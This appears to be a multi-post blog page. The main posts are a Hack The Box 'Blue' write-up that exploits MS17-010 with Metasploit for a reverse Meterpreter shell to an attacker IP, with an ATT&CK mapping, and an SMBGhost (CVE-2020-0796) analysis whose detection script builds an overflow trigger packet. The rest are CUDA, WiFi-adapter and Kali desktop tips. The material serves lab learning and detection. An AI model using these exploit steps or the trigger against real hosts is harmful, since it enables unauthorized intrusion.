Hack The Box Write-up: BLUE


This article is a write-up of how the HTB machine "Blue" was pwned and its root flag captured, followed by a modelling of that attack path with the MITRE ATT&CK framework.

Recon

Introduction

The reconnaissance phase, often referred to as the “recon phase,” is a crucial initial step in the process of hacking a machine on Hack The Box (HTB). This phase involves gathering as much information as possible about the target system, which can include identifying the operating system, open ports, running services, software versions, and potential vulnerabilities. The goal of this phase is to construct a detailed profile of the target, which can be used to plan further attack strategies.

In the context of hacking a machine on HTB, where the environment is designed for testing and learning, it’s appropriate to choose active scanning methods as outlined in the MITRE ATT&CK framework. Active scanning involves directly interacting with the target system to gather information. This approach is suitable in a controlled environment like HTB, where the primary goal is to learn and practice hacking skills without the need for stealth.

Phase I

In the first phase, nmap was run against 10.129.55.2 with -sC (the default NSE script set) and -sV (service and version detection). This combination is a good first pass for initial reconnaissance, because it reports not just open ports but what is listening on them and, through the SMB scripts, what operating system the host claims to run.

Key findings from this scan included:

  • Open ports: tcp/139 (NetBIOS session service) and tcp/445 (SMB over TCP) are open. On a Windows host these belong to Microsoft's own SMB server (the file and printer sharing service), not to Samba, which is the Linux/Unix implementation of the same protocol; either way they mean SMB is reachable and is the obvious surface to probe next.
  • OS detection: the smb-os-discovery script run by -sC reported the target as Windows 7 Service Pack 1 (build 7601). Windows 7 has been out of support since January 2020, so a host still running it is likely to carry unpatched, well-documented vulnerabilities.

Phase II

Once SMB was confirmed to be running on the target (open ports 445 and 139), the next logical step was a vulnerability scan focused on SMB. Nmap was used again, this time with --script smb-vuln* (note the double dash; the wildcard must be quoted in shells that would otherwise expand it). This selects the family of NSE scripts that test for known SMB weaknesses in both Windows and Samba, including smb-vuln-ms17-010.

The targeted scan revealed a critical finding: the target is vulnerable to MS17-010, the Microsoft bulletin covering the SMBv1 flaws exploited by EternalBlue (EternalBlue itself is CVE-2017-0144; the nmap script reports the family under CVE-2017-0143). The script's test is non-intrusive: it sends a TRANS2 SESSION_SETUP request over a null session and treats the STATUS_INSUFF_SERVER_RESOURCES reply of an unpatched server as the positive signal, so it does not risk crashing the host. This vulnerability is notable for several reasons, among them:

  • Severity: EternalBlue is a high-severity bug, rated 9.3 on CVSS v2 (8.1 on CVSS v3). It allows unauthenticated remote code execution in the kernel, and it was infamously used to spread the WannaCry ransomware in May 2017.
  • Exploitability: the vulnerability opens a clear path to the machine. Exploits for it are widely available and well documented, the Metasploit Framework's ms17_010_eternalblue module among them. Kernel pool corruption is never entirely safe, though: a failed attempt can blue-screen the target, which matters far more on a client's network than in a lab.

This discovery is a key milestone in the hacking process, as it provides a direct and potentially straightforward method to exploit the target system, aligning with the overall objective of gaining unauthorized access to the machine on the HTB platform.
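The two recon phases above produce a lot of text; what you actually want out of them is a short list of hosts, open ports, OS hints and positive vulnerability checks. The following is an added example (not part of the original write-up) that parses nmap's XML output (-oX) into exactly that and picks out hosts that are worth handing to the EternalBlue module. The embedded XML is a constructed sample modelled on nmap's output format, not a capture from the machine; the element and key names (title, state, risk_factor, ids) follow nmap's vulns NSE library.

```python
"""Triage an nmap -oX report: open ports, the SMB OS hint and VULNERABLE NSE results."""
import xml.etree.ElementTree as ET

# Constructed sample modelled on nmap's XML output for
#   nmap -sC -sV --script smb-vuln-ms17-010 -oX scan.xml 10.129.55.2
# It is not a capture from the machine.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sC -sV --script smb-vuln-ms17-010 -oX scan.xml 10.129.55.2">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="10.129.55.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139">
        <state state="open" reason="syn-ack"/>
        <service name="netbios-ssn" product="Microsoft Windows netbios-ssn" ostype="Windows"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="microsoft-ds" product="Windows 7 Service Pack 1 microsoft-ds" ostype="Windows"/>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="filtered" reason="no-response"/>
        <service name="ms-wbt-server"/>
      </port>
    </ports>
    <hostscript>
      <script id="smb-os-discovery" output="OS: Windows 7 Service Pack 1">
        <elem key="os">Windows 7 Service Pack 1</elem>
      </script>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
          <elem key="risk_factor">HIGH</elem>
          <table key="ids"><elem>CVE:CVE-2017-0143</elem></table>
        </table>
      </script>
      <script id="smb-vuln-ms08-067" output="NOT VULNERABLE">
        <table key="ms08-067"><elem key="state">NOT VULNERABLE</elem></table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""

VULN_STATES = ("VULNERABLE", "LIKELY VULNERABLE")  # nmap's vulns library wording


def parse_nmap_xml(xml_text):
    """Return one dict per host: ip, open_ports, os_hint and positive vuln-script findings."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        entry = {"ip": addr.get("addr") if addr is not None else None,
                 "open_ports": [], "os_hint": None, "vulnerable": []}
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # filtered/closed ports are noise for the attack surface
            svc = port.find("service")
            entry["open_ports"].append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
            })
        for script in host.iter("script"):  # host scripts and per-port scripts alike
            sid = script.get("id", "")
            if sid == "smb-os-discovery":
                os_elem = script.find("elem[@key='os']")
                if os_elem is not None:
                    entry["os_hint"] = os_elem.text
            if sid.startswith("smb-vuln-"):
                for table in script.findall("table"):
                    state = table.find("elem[@key='state']")
                    if state is None or not state.text.startswith(VULN_STATES):
                        continue  # only positive findings are reported
                    title = table.find("elem[@key='title']")
                    entry["vulnerable"].append({"script": sid, "id": table.get("key"),
                                                "state": state.text,
                                                "title": title.text if title is not None else None})
        hosts.append(entry)
    return hosts


def ms17_010_targets(hosts):
    """Hosts worth feeding to ms17_010_eternalblue: SMB reachable and the check positive."""
    targets = []
    for h in hosts:
        smb_open = any(p["port"] == 445 and p["proto"] == "tcp" for p in h["open_ports"])
        flagged = any(v["script"] == "smb-vuln-ms17-010" for v in h["vulnerable"])
        if smb_open and flagged:
            targets.append(h["ip"])
    return targets


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in parsed:
        print(h["ip"], h["os_hint"], [p["port"] for p in h["open_ports"]], [v["id"] for v in h["vulnerable"]])
    print("EternalBlue candidates:", ms17_010_targets(parsed))
```

Run the real scan with -oX and feed the file to parse_nmap_xml; the filter deliberately ignores closed and filtered ports and any script whose state is not VULNERABLE or LIKELY VULNERABLE, so a box that merely has port 445 open is not listed as a target.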

Attack

Upon confirming that the target was vulnerable to MS17-010 (EternalBlue), the vulnerability was exploited with the Metasploit Framework. The process involved the following steps:

  • Searching for an MS17-010 exploit: within msfconsole, search ms17-010 lists every module that references the bulletin, scanners as well as exploits.
  • Identifying the appropriate exploit: the results include exploit/windows/smb/ms17_010_eternalblue, which targets the SMBv1 kernel pool corruption on 64-bit Windows 7 / Server 2008 R2 and delivers its payload through a reverse shell.
  • Setting up the exploit: after use exploit/windows/smb/ms17_010_eternalblue, the module was configured with the necessary options:
    • RHOSTS: the target's IP address, 10.129.55.2
    • LHOST: the attacker machine's IP address, 10.10.14.17, which the reverse shell on the target connects back to (LPORT was left at the default, 4444)
    • Payload: left at the module default, windows/x64/meterpreter/reverse_tcp
  • Executing the exploit: run (or exploit) launched the attack; the module prints its progress and a Meterpreter reverse TCP session opened successfully.
  • Checking privileges: getuid in the Meterpreter session returned NT AUTHORITY\SYSTEM, the highest privilege level on Windows. There is no user-to-administrator step on this box: the exploit runs inside the kernel, so the session starts as SYSTEM.

Flag Capture

Once inside the system, the next task was to reach the directory where the root flag is kept on HTB Windows machines, the Administrator's desktop: cd C:\Users\Administrator\Desktop (Meterpreter's cd accepts the Windows path as written).

To view the root flag, cat root.txt was used; Meterpreter's built-in cat prints the file's contents, revealing the flag. Because the session is already SYSTEM, no further escalation is needed to read a file in the Administrator's profile.

MITRE ATT&CK Framework Modelling

Modelling the intrusion with the MITRE ATT&CK framework gives a structured way to name and categorise the techniques used. ATT&CK is a knowledge base of adversary tactics (the "why" of a step) and techniques (the "how") observed in real-world intrusions, so mapping a lab exercise onto it makes the exercise comparable with real incident reports and with a defender's detection coverage. For the HTB Blue machine the steps align as follows; two entries that are often mapped loosely are corrected inline:

  • Reconnaissance (Tactic ID: TA0043):
    • Active Scanning: Vulnerability Scanning (Technique ID: T1595.002): scanning the target with nmap for open ports and services, then running the smb-vuln* scripts to test for MS17-010. T1595 on its own is the parent Active Scanning technique; the sub-technique is the precise fit.
  • Resource Development (Tactic ID: TA0042):
    • Obtain Capabilities: Tool (Technique ID: T1588.002): installing and preparing the Metasploit Framework on the attacker host. Acquire Infrastructure (T1583) covers servers, domains and VPS accounts rather than tooling, so it does not describe this step.
  • Initial Access (Tactic ID: TA0001):
    • Exploit Public-Facing Application (Technique ID: T1190): exploiting EternalBlue (MS17-010) in the SMB service listening on tcp/445.
  • Execution (Tactic ID: TA0002):
    • The Meterpreter payload is run by the exploit itself. ATT&CK has no Execution technique for payloads delivered through a server-side exploit; that outcome belongs to the T1190 entry. Exploitation for Client Execution (T1203) is reserved for client-side software such as browsers and document readers and does not apply to a listening SMB service. Commands issued later through Meterpreter are covered by the Discovery and Collection entries below.
  • Privilege Escalation (Tactic ID: TA0004):
    • Exploitation for Privilege Escalation (Technique ID: T1068) is commonly listed here, but no separate escalation took place: the SMBv1 exploit executes in the kernel and the session starts as NT AUTHORITY\SYSTEM. Record the SYSTEM-level outcome on the T1190 entry instead of as an additional technique.
  • Discovery (Tactic ID: TA0007):
    • File and Directory Discovery (Technique ID: T1083): navigating the file system to locate root.txt.
  • Collection (Tactic ID: TA0009):
    • Data from Local System (Technique ID: T1005): reading the root flag from root.txt.
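A mapping like the one above is most useful when it can be loaded into ATT&CK Navigator and overlaid on detection coverage. The following is an added example, not part of the original write-up, that turns (tactic, technique, evidence) observations into a Navigator layer, validating the IDs and merging repeated sightings of the same technique. It uses the sub-technique T1595.002 for the nmap scanning and T1588.002 (Obtain Capabilities: Tool) for Metasploit, since T1583 describes infrastructure rather than tooling; the tactic short-name table only covers the tactics used on this page, and the version numbers in the layer are an assumption (Navigator upgrades older layer formats on import).

```python
"""Build an ATT&CK Navigator layer from the techniques observed on the box."""
import json
import re

# Navigator identifies tactics by short name, not by TAxxxx ID. Assumed sufficient
# for this write-up; extend the table for other tactics.
TACTIC_SHORTNAMES = {
    "TA0043": "reconnaissance",
    "TA0042": "resource-development",
    "TA0001": "initial-access",
    "TA0002": "execution",
    "TA0004": "privilege-escalation",
    "TA0007": "discovery",
    "TA0009": "collection",
}
TECHNIQUE_ID = re.compile(r"^T\d{4}(?:\.\d{3})?$")  # T1190 or T1595.002

# (tactic ID, technique ID, evidence) for HTB Blue.
BLUE_OBSERVATIONS = [
    ("TA0043", "T1595.002", "nmap -sC -sV and --script smb-vuln* against 10.129.55.2"),
    ("TA0042", "T1588.002", "Metasploit Framework prepared on the attacker host"),
    ("TA0001", "T1190", "exploit/windows/smb/ms17_010_eternalblue via SMB tcp/445; session is NT AUTHORITY\\SYSTEM"),
    ("TA0007", "T1083", "cd C:\\Users\\Administrator\\Desktop in Meterpreter"),
    ("TA0009", "T1005", "cat root.txt in Meterpreter"),
]


def build_layer(name, observations, description=""):
    """Validate every observation and merge repeats of the same technique/tactic pair."""
    merged = {}
    for tactic_id, technique_id, evidence in observations:
        if tactic_id not in TACTIC_SHORTNAMES:
            raise ValueError(f"unknown tactic ID {tactic_id}")
        if not TECHNIQUE_ID.match(technique_id):
            raise ValueError(f"malformed technique ID {technique_id}")
        tactic = TACTIC_SHORTNAMES[tactic_id]
        item = merged.setdefault((technique_id, tactic), {
            "techniqueID": technique_id,
            "tactic": tactic,
            "color": "#fd8d3c",
            "comment": "",
            "enabled": True,
            "score": 0,
            "showSubtechniques": False,
        })
        item["score"] += 1  # score = number of times the technique was observed
        item["comment"] = f"{item['comment']}; {evidence}" if item["comment"] else evidence
    return {
        "name": name,
        # Version numbers are an assumption; Navigator upgrades older layer formats on import.
        "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": description,
        "techniques": list(merged.values()),
        "gradient": {"colors": ["#ffffff", "#ff6666"], "minValue": 0, "maxValue": 3},
    }


def layer_json(layer):
    """Serialise for the Navigator 'Open Existing Layer' upload."""
    return json.dumps(layer, indent=2)


if __name__ == "__main__":
    print(layer_json(build_layer("HTB Blue", BLUE_OBSERVATIONS, "Path to SYSTEM via MS17-010")))
```

Save the output as a .json file and open it in Navigator; because the score counts observations, a technique used at several points in an engagement shows up darker than a one-off, which is the signal a detection engineer wants when deciding where to add coverage.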

That’s it, Enjoy!


How to install multiple CUDA versions on a single Linux server

After you have installed the first CUDA toolkit (preferably the latest stable version) and want to install other versions beside it, for example because a framework was built against an older one, do the following:

Download the standalone file installer, e.g. https://developer.download.nvidia.com/compute/cuda/11.7.0/local_installers/cuda_11.7.0_515.43.04_linux.run

chmod +x file_name
sudo ./file_name

When prompted to choose components, you MUST deselect the driver: the installer bundles its own driver (515.43.04 in the file above) and would replace the one already on the system. It is simplest to keep only the CUDA toolkit and deselect everything else.

When asked whether to update the /usr/local/cuda symlink, answer no, so the default toolkit stays the one you installed first.

After the installation finishes, point the current shell at the new version and you are good to go:

export PATH=/usr/local/cuda-11.7/bin:$PATH
export LD_LIBRARY_PATH=/usr/local/cuda-11.7/lib64:$LD_LIBRARY_PATH

The one driver is shared by all toolkits, so it must be at least as new as the minimum the newest toolkit requires; the "CUDA Version" shown by nvidia-smi is the newest toolkit that driver supports.

Tested and working properly on Ubuntu 22.04 with A100 GPUs

Enjoy!

Source: https://medium.com/@peterjussi/multicuda-multiple-versions-of-cuda-on-one-machine-4b6ccda6faae


CVE-2020-0796 – SMBGhost RCE Vulnerability

Description and Impact

Also known as CoronaBlue and EternalDarkness (SMBleedingGhost is the later chained exploit that combines it with the SMBleed bug, CVE-2020-1206), this critical pre-authentication remote code execution vulnerability affects SMB 3.1.1 on Windows builds that have SMBv3 compression enabled. The root cause is an integer overflow rather than a plain buffer overflow: when the server computes the buffer size for a compressed packet whose header carries malformed size fields, the addition wraps, a buffer far smaller than the data is allocated, and decompression then writes past its end. The resulting kernel memory corruption at minimum crashes the machine and, as the public exploits later showed, can be turned into arbitrary code execution in the kernel.

The vulnerability affects both servers and clients. To attack a server, the attacker sends a crafted compressed packet to tcp/445 without authenticating. To attack a client, the attacker stands up a malicious SMBv3 server and tricks a user into connecting to it, for example through a UNC path.

The following products and versions are affected:

  Product                       Version
  Windows Server (Server Core)  version 1903
  Windows Server (Server Core)  version 1909
  Windows 10                    version 1903 for 32-bit, x64 and ARM64 systems
  Windows 10                    version 1909 for 32-bit, x64 and ARM64 systems

Earlier Windows 10 builds (1809 and below) and Windows Server 2019 do not implement SMB compression and are not affected.

Lifecycle and Trend

The vulnerability became public on March 10th, 2020, when Cisco Talos and Fortinet described it in their blog posts for that month's Microsoft Patch Tuesday even though no fix shipped that day; the posts identified it as CVE-2020-0796. Microsoft acknowledged it the same day in advisory ADV200005 and released an out-of-band patch (KB4551762) on March 12th, 2020. For hosts that cannot be patched immediately, the advisory's workaround is to disable SMBv3 compression on the server (set the DisableCompression DWORD under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters to 1); this protects servers but not clients connecting to a malicious server.

In early March 2020, Keysight's honeypots detected a sudden increase in SMB-related activity, peaking at 63,322 scans on the 13th of March.

Multiple proofs of concept were released after Microsoft published the security advisory: first crash (denial-of-service) triggers, then local privilege escalation, and by June 2020 a working remote code execution exploit.

Programming Flaw

There are two main flaws leading to this vulnerability:

  • Improper input validation: when the server receives a compressed packet, it does not validate the OriginalSize and Offset fields of the header before using them. Their sum should be checked against the maximum SMB message size, and the packet rejected if it is too large or if the addition overflows.
  • Missing allocation-size check: the buffer is allocated with the (wrapped) computed size, and decompression then writes up to OriginalSize bytes into it without confirming the buffer actually has that much room. Checking, with overflow-safe arithmetic, that the destination holds at least OriginalSize + Offset bytes before the copy would close the hole.

Exploitation Methodology

The vulnerability is an integer overflow in the Srv2DecompressData function of srv2.sys, the kernel-mode SMBv2/3 server driver. It is triggered when the server receives an SMB2_COMPRESSION_TRANSFORM_HEADER whose size fields are malformed. Srv2DecompressData computes the size of the buffer that will hold the decompressed data by adding the header's OriginalSize field to its Offset field, in 32-bit arithmetic with no overflow check, and passes the result to SrvNetAllocateBuffer. With OriginalSize close to 0xFFFFFFFF the sum wraps, so the kernel allocates a buffer far smaller than the data about to be written into it; the following copy and decompression then corrupt adjacent kernel memory, which crashes the kernel or, with a crafted heap layout, yields code execution.

A Metasploit module exists: exploit/windows/smb/cve_2020_0796_smbghost. Like the public proofs of concept it works by corrupting kernel memory, so a failed attempt usually blue-screens the target rather than failing quietly. To find vulnerable hosts without that risk, use a negotiate-based check that only looks for dialect 3.1.1 with a compression capability context in the NEGOTIATE response, which is what the public SMBGhost scanners do.

Log Traces

The following network indicators suggest attempts to exploit this vulnerability:

  • Spikes in SMB traffic on tcp/445, particularly SMB 3.1.1 NEGOTIATE exchanges followed by compressed packets from hosts that never sent compressed SMB before
  • Packets whose ProtocolId is 0xFC 'S' 'M' 'B' (the compression transform header) with an OriginalSize/Offset combination that overflows 32 bits or far exceeds the maximum SMB message size
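The "anomalous size value" above is concrete arithmetic, and the same arithmetic is the programming flaw. The following is an added example, not part of the original post and not Microsoft's code, that parses SMB2 COMPRESSION_TRANSFORM_HEADERs (the 16-byte layout from MS-SMB2 section 2.2.42), shows the size computation an unpatched srv2.sys performed beside a checked version, and tags packets a detector should flag. The two packets are constructed, not captures; the 16 MiB "sane" ceiling is an assumption chosen to sit well above the largest SMB2 read or write (8 MiB).

```python
"""Parse SMB2 COMPRESSION_TRANSFORM_HEADERs and flag the CVE-2020-0796 size overflow."""
import struct

# MS-SMB2 2.2.42: ProtocolId (4) OriginalSize (4) CompressionAlgorithm (2) Flags (2) Offset (4)
COMPRESSION_PROTOCOL_ID = b"\xfcSMB"
HEADER = struct.Struct("<4sIHHI")
ALGORITHMS = {0: "NONE", 1: "LZNT1", 2: "LZ77", 3: "LZ77+Huffman", 4: "Pattern_V1"}
U32_MAX = 0xFFFFFFFF
# Assumption: nothing legitimate decompresses to more than this. The largest SMB2
# read/write is 8 MiB, so 16 MiB leaves headroom while still catching absurd sizes.
MAX_SANE_ORIGINAL_SIZE = 16 * 1024 * 1024


def parse_header(packet):
    """Unpack the transform header; raise on anything that is not one."""
    if len(packet) < HEADER.size:
        raise ValueError("packet shorter than a compression transform header")
    proto, original_size, algorithm, flags, offset = HEADER.unpack_from(packet)
    if proto != COMPRESSION_PROTOCOL_ID:
        raise ValueError("ProtocolId is not 0xFC 'S' 'M' 'B'")
    return {
        "original_size": original_size,
        "algorithm": ALGORITHMS.get(algorithm, f"unknown({algorithm})"),
        "flags": flags,
        "offset": offset,
        "payload_len": len(packet) - HEADER.size,
    }


def vulnerable_alloc_size(original_size, offset):
    """What unpatched Srv2DecompressData computed: a 32-bit add with no overflow check."""
    return (original_size + offset) & U32_MAX


def checked_alloc_size(original_size, offset):
    """The allocation size a fixed server should use: reject overflow and absurd sizes."""
    total = original_size + offset  # Python ints do not wrap, so this is the true sum
    if total > U32_MAX:
        raise ValueError("OriginalSize + Offset overflows 32 bits")
    if original_size > MAX_SANE_ORIGINAL_SIZE:
        raise ValueError("OriginalSize exceeds the maximum SMB message size")
    return total


def classify(packet):
    """Detection view: return the parsed header and a list of anomaly tags."""
    hdr = parse_header(packet)
    tags = []
    if hdr["original_size"] + hdr["offset"] > U32_MAX:
        tags.append("size-overflow")          # the CVE-2020-0796 trigger condition
    if hdr["original_size"] > MAX_SANE_ORIGINAL_SIZE:
        tags.append("oversized-original")
    if hdr["offset"] > hdr["payload_len"]:
        tags.append("offset-beyond-payload")  # claims more raw bytes than were sent
    if hdr["algorithm"].startswith("unknown"):
        tags.append("unknown-algorithm")
    return hdr, tags


# Constructed packets (not captures): a plausible benign one and the overflow trigger.
BENIGN = HEADER.pack(COMPRESSION_PROTOCOL_ID, 0x40, 2, 0, 0) + b"\x00" * 0x20
TRIGGER = HEADER.pack(COMPRESSION_PROTOCOL_ID, 0xFFFFFFFF, 2, 0, 0x10) + b"A" * 0x10 + b"\x00" * 0x20


if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("trigger", TRIGGER)):
        hdr, tags = classify(pkt)
        alloc = vulnerable_alloc_size(hdr["original_size"], hdr["offset"])
        print(f"{name}: {hdr} tags={tags} unpatched-alloc={alloc:#x}")
```

For the trigger packet the unpatched computation yields an allocation of 0xF bytes for a header that promises 0xFFFFFFFF bytes of output, which is the whole bug in one number. In a real sensor the classifier would sit behind an SMB 3.1.1 session parser that has already matched the 0xFC 'S' 'M' 'B' ProtocolId, which is also what the Snort and Fortinet signatures listed below key on.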

IDS Detection

Fortinet

Signature ID : 48773 MS.SMB.Server.Compression.Transform.Header.Memory.Corruption

Cisco Snort

1:53427 <-> ENABLED <-> OS-WINDOWS Microsoft Windows SMB srv2.sys remote code execution attempt (os-windows.rules)
1:53428 <-> ENABLED <-> OS-WINDOWS Microsoft Windows SMB srv2.sys remote code execution attempt (os-windows.rules)
1:53426 <-> ENABLED <-> OS-WINDOWS Microsoft Windows SMB srv2.sys remote code execution attempt (os-windows.rules)
1:53425 <-> ENABLED <-> OS-WINDOWS Microsoft Windows SMB srv2.sys remote code execution attempt (os-windows.rules)

McAfee IPS

Attack Name: NETBIOS-SS: Samba Remote Code Execution Vulnerability (CVE-2020-0796)
Attack ID: 0x43c0e600


How to configure TP-LINK TL-WN722N v1.1 WiFi Adapter for Kali Linux

This WiFi adapter was not detected by Kali (2023.2 as of now), and I had to install just one extra package to get it working properly. The v1.x hardware uses the Atheros AR9271 chipset, which is why it is popular for wireless work: it supports monitor mode and packet injection. The v2 and v3 revisions sold under the same model name use a Realtek chipset and need a different driver, so check the version printed on the adapter before following this:

sudo apt update
sudo apt install firmware-atheros

Unplug and plug it again, and voila!

Enjoy!

Sources:

https://unix.stackexchange.com/questions/326462/how-do-i-install-atheros-ar9271-wifi-drivers-on-debian


Kali Desktop in a VM: Have a better desktop experience

Well, this issue has been bothering me for a while. If you have Kali Linux Desktop on a Virtual Machine (VMware Workstation or VirtualBox for example), and you have a low-resolution screen, you won’t feel that much, however, if you have a 2K+ screen, you will see these tiny icons and text:

Some would say just use the HiDPI mode, but then everything becomes too big. The best solution I have found so far is to install the GNOME desktop. Note: before you do that, you might want to change the line in /etc/apt/sources.list that points to "kali-rolling" so that it points to "kali-last-snapshot" before running the command below, for a more stable Kali experience (Kali overall, not just the desktop):

sudo apt update && sudo apt install kali-desktop-gnome

Once prompted to select a display manager, choose gdm3.

After rebooting, login normally, open the Tweaks App (Not Kali Tweaks), go to Fonts, then modify the Scaling Factor to your preference. It will be much more convenient and comfortable for your eyes:

That’s it, Enjoy!
